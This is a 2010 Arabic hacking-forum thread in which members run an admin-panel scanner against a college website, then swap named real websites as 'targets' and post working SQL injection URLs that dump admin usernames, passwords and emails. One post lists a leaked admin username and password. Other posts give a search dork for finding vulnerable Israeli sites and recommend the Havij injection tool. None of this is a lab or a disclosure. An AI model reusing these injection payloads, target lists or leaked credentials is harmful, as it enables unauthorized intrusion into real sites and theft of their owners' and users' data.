[-] Not Found <- http://www.mcny.edu/moderator/login.html
[-] Not Found <- http://www.mcny.edu/adminarea/login.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/i
[-] Not Found <- http://www.mcny.edu/panel-administracion/a
[-] Not Found <- http://www.mcny.edu/modelsearch/index.html
[-] Not Found <- http://www.mcny.edu/modelsearch/admin.html
[-] Not Found <- http://www.mcny.edu/admincontrol/login.htm
[-] Not Found <- http://www.mcny.edu/adm/index.html
[-] Not Found <- http://www.mcny.edu/adm.html
[-] Not Found <- http://www.mcny.edu/moderator/admin.html
[-] Not Found <- http://www.mcny.edu/user.php
[-] Not Found <- http://www.mcny.edu/account.html
[-] Not Found <- http://www.mcny.edu/controlpanel.html
[-] Not Found <- http://www.mcny.edu/admincontrol.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/l
[-] Not Found <- http://www.mcny.edu/wp-login.php
[-] Not Found <- http://www.mcny.edu/adminLogin.php

[+] Found -> http://www.mcny.edu/admin/adminLogin.php

[-] Not Found <- http://www.mcny.edu/home.php
[-] Not Found <- http://www.mcny.edu/admin.php
[-] Not Found <- http://www.mcny.edu/adminarea/index.php
[-] Not Found <- http://www.mcny.edu/adminarea/admin.php
[-] Not Found <- http://www.mcny.edu/adminarea/login.php
[-] Not Found <- http://www.mcny.edu/panel-administracion/i
[-] Not Found <- http://www.mcny.edu/panel-administracion/a
[-] Not Found <- http://www.mcny.edu/modelsearch/index.php
[-] Not Found <- http://www.mcny.edu/modelsearch/admin.php
[-] Not Found <- http://www.mcny.edu/admincontrol/login.php
[-] Not Found <- http://www.mcny.edu/adm/admloginuser.php
[-] Not Found <- http://www.mcny.edu/admloginuser.php
[-] Not Found <- http://www.mcny.edu/admin2.php
[-] Not Found <- http://www.mcny.edu/admin2/login.php
[-] Not Found <- http://www.mcny.edu/admin2/index.php
[-] Not Found <- http://www.mcny.edu/adm/index.php
[-] Not Found <- http://www.mcny.edu/adm.php
[-] Not Found <- http://www.mcny.edu/affiliate.php
[-] Not Found <- http://www.mcny.edu/adm_auth.php
[-] Not Found <- http://www.mcny.edu/memberadmin.php
[-] Not Found <- http://www.mcny.edu/administratorlogin.php
أخي العزيز
جرب إستعمال برنامج havij
وقولي ماهي النتيجة

TIKTAKram 08-13-2010 01:26 AM
باك من جديد معكم

آسف على الغياب بسبب مشاكل من العضوية

بالتوفيق

darkman.dz 08-13-2010 02:11 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة Syst3m-32 (المشاركة 193411)
باك من جديد معكم

آسف على الغياب بسبب مشاكل من العضوية

بالتوفيق
أهلا بعودتك توحشناك يا وليد لبلاد

darkman.dz 08-13-2010 05:19 PM
وقيلة مات كاش واحد هنا
على هاديك واحد ما بقى يدور هنا
ههههههههههههههههههههههههههههههه

medoo_mohamed 08-13-2010 07:07 PM
مفيش اهداف جديدة ولا ايه يا شباب منتظر الهدف الجديد

darkman.dz 08-13-2010 08:08 PM
الهدف دخل المرمى أخي
ههههههههههههههههههههه

medoo_mohamed 08-13-2010 08:43 PM
هههههههههههه ومفيش اعادة للهدف ولا ايه هههههههههههه

NeTCaT-Ma 08-13-2010 09:46 PM
تفضل اللي يبحث عن الهدف
http://www.beautycall.co.uk/gallery.php?id=1

darkman.dz 08-13-2010 11:37 PM
كود:
http://www.beautycall.co.uk/gallery.php?id=-1 union select 1,2,group_concat(id,0x3a,username,0x3a,password,0x3a,email)+from+admin--
هاته هي الحقنة الأولى

d4rK-h4ck3r 08-13-2010 11:47 PM
http://www.beautycall.co.uk/gallery....uk_web.admin--

http://www.beautycall.co.uk/gallery....rs+limit+1,1--

d4rK-h4ck3r 08-13-2010 11:48 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 194171)
كود:
http://www.beautycall.co.uk/gallery.php?id=-1 union select 1,2,group_concat(id,0x3a,username,0x3a,password,0x3a,email)+from+admin--
هاته هي الحقنة الأولى
اول دايكا سابقني :s

medoo_mohamed 08-14-2010 12:16 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة mr.tchach (المشاركة 194121)
تفضل اللي يبحث عن الهدف
http://www.beautycall.co.uk/gallery.php?id=1
اليوزر :
beautycall2010

الباص :
4SweetCandy1

الايميل :
info@mocit.co.uk

الحقنة :
http://www.beautycall.co.uk/gallery....9+from+admin--

m0h@med 08-14-2010 09:22 AM
السلام عليكم
بعد اذنك مستر .
الهدف الجديد
كود:
http://lpp.psycho.univ-paris5.fr/event.php?id=115
صحا فطوركم ....

synyster-hacker 08-14-2010 09:54 AM
http://lpp.psycho.univ-paris5.fr/eve...+from+member--
D:

synyster-hacker 08-14-2010 09:58 AM
http://www.worldmusicinstitute.org/event.php?id=906'

oR

http://www.bonk.co.il/event.php?id=205'

synyster-hacker 08-14-2010 10:09 AM
DorK 4 israeli sites

inurl:show.php?id= site:.il

kanvi 08-14-2010 10:48 AM
[quote=synyster-hacker;194424]http://www.worldmusicinstitute.org/event.php?id=906'


شكرا اخي على الهدف وهذه الحقنة الاول:

كود PHP:
http://www.worldmusicinstitute.org/event.php?id=-906+union+select+ 1,2,3,4,5,6,7,8,9,@@version,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74-- 
اصدار القاعدة عند مشكلة معهa012
4.1.25-Debian_mt1-log

darkman.dz 08-14-2010 03:52 PM
السلام عليكم ورحمة الله تعالى وبركاته

TIKTAKram 08-14-2010 11:59 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 194586)
السلام عليكم ورحمة الله تعالى وبركاته
و عليكم السلام و رحمة الله و بركاته

TIKTAKram 08-15-2010 12:00 AM
محتاجين هدف جديد ؟؟؟
آمروني و أنا في الخدمة :)

HOLACO 08-15-2010 10:09 AM
http://www.kassen-vertrieb.de/produkt-info.php?id=30


الساعة الآن 03:22 PM
صفحة 10 من 11 « الأولى 89 10 11
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0